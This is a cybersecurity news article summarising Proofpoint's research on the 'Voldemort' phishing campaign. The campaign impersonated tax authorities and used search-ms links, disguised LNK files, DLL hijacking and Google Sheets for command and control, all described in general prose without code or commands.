Thursday, February 6, 2025
HomeCyber Security NewsVoldemort Threat Actors Abusing Google Sheets to Attack Windows Users 

Voldemort Threat Actors Abusing Google Sheets to Attack Windows Users 

Published on

SIEM as a Service

Follow Us on Google News

Researchers from Proofpoint have uncovered a sophisticated cyberattack campaign leveraging Google Sheets as a command and control (C2) platform.

Dubbed “Voldemort” by the researchers, this campaign targets Windows users globally, employing a novel attack chain that combines both common and rare techniques to deliver custom malware.

This article delves into the intricacies of the campaign, its implications, and the broader cybersecurity challenges it presents.

Unveiling the Voldemort Campaign

Proofpoint researchers identified an attack campaign that stands out due to its unique use of Google Sheets for C2 operations.

The malware, internally named “Voldemort,” is a custom backdoor written in C, capable of gathering information and deploying additional payloads.

The attack chain involves a series of sophisticated techniques, including the abuse of Google Sheets, which is relatively uncommon in the threat landscape.

What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!

The campaign began on August 5, 2024, and involved over 20,000 malicious messages targeting more than 70 organizations worldwide.

The threat actors impersonated tax authorities from various countries, including the U.S., UK, France, Germany, Italy, India, and Japan.

These emails, written in the language of the impersonated authority, were sent from compromised domains, adding a layer of authenticity to the phishing attempts.

Emails impersonating HRMC and DGFIP
Emails impersonating HRMC and DGFIP

Attack Chain Mechanics

The emails contained links that redirected victims to a landing page hosted on InfinityFree. Upon clicking a “View Document” button, the page checked the user’s browser for a Windows environment.

If detected, the victim was redirected to a TryCloudflare-tunneled URI, prompting the opening of Windows Explorer.

This stealthy redirection technique allowed the malware to masquerade as a local PDF file, increasing the likelihood of user interaction.

InfinityFree hosted a landing page
InfinityFree hosted a landing page

Technical Analysis of the Malware

The Voldemort campaign exploits the Windows search protocol (search-ms) to display remote files as if they were local.

This technique, used to deploy remote access trojans (RATs), is becoming increasingly popular among cybercriminals. The campaign also utilizes saved search file formats (.search-ms) to further obscure the malicious activity.

HTML Redirect Logic embedded on a landing page
HTML Redirect Logic embedded on a landing page

Execution and Payload Delivery

If the victim executes the malicious LNK file, it triggers a PowerShell command to run Python.exe from a WebDAV share, executing a Python script without downloading files to the host.

This script collects system information and sends it to the threat actor’s infrastructure. The malware then downloads a decoy PDF and a password-protected ZIP file, extracting and executing a legitimate executable vulnerable to DLL hijacking.

Shortcut masquerading as a PDF
Shortcut masquerading as a PDF

The Role of Google Sheets in C2 Operations

Leveraging Google Infrastructure

Rather than using dedicated or compromised infrastructure, the Voldemort malware utilizes Google Sheets for C2, data exfiltration, and command execution.

By authenticating with Google Sheets using a client token, the malware can read and write data, effectively using the platform as a communication channel with the threat actors.

The malware supports a range of commands, including file operations and system commands, all executed via Google Sheets.

The actors can issue commands to the bot, which reports back with status messages, including the malware’s name, “Voldemort.”

Decrypted status messages
Decrypted status messages

Implications and Challenges

APT Activity with Cybercrime Characteristics

Proofpoint assesses with moderate confidence that the Voldemort campaign is likely orchestrated by an advanced persistent threat (APT) actor focused on intelligence gathering.

Despite its espionage-like capabilities, the campaign’s volume and targeting align more closely with cybercriminal activities, presenting a unique blend of threats.

PCAP of pingb.in traffic
PCAP of pingb.in traffic

The abuse of cloud services like Google Sheets for malicious purposes highlights a growing trend in the cyber threat landscape.

Such tactics allow threat actors to leverage legitimate infrastructure, making detection and mitigation more challenging for cybersecurity professionals.

Manual browsing of WebDAV share
Manual browsing of WebDAV share

The Voldemort campaign represents a significant evolution in cyberattack strategies, combining sophisticated techniques with innovative cloud-based services for malicious purposes.

As threat actors continue to adapt and exploit new technologies, cybersecurity professionals must remain vigilant and proactive in developing defenses against such complex threats.

Using Google Sheets as a C2 platform underscores the need for enhanced security measures and awareness of the potential misuse of legitimate cyberattack services.

Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

OpenAI Data Breach – Threat Actor Allegedly Claims 20 Million Logins for Sale

OpenAI may have become the latest high-profile target of a significant data breach.A...

Lumma Stealer Attacking Windows Users In India With Fake Captcha Pages

Cybersecurity experts are raising alarms over a new wave of attacks targeting Windows users...

Beware of Lazarus LinkedIn Recruiting Scam Targeting Org’s to Deliver Malware

A new wave of cyberattacks orchestrated by the North Korea-linked Lazarus Group has been...

F5 BIG-IP SNMP Flaw Allows Attackers to Launch DoS Attacks

A recently disclosed vulnerability in F5's BIG-IP systems has raised alarm within the cybersecurity...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

OpenAI Data Breach – Threat Actor Allegedly Claims 20 Million Logins for Sale

OpenAI may have become the latest high-profile target of a significant data breach.A...

Lumma Stealer Attacking Windows Users In India With Fake Captcha Pages

Cybersecurity experts are raising alarms over a new wave of attacks targeting Windows users...

Beware of Lazarus LinkedIn Recruiting Scam Targeting Org’s to Deliver Malware

A new wave of cyberattacks orchestrated by the North Korea-linked Lazarus Group has been...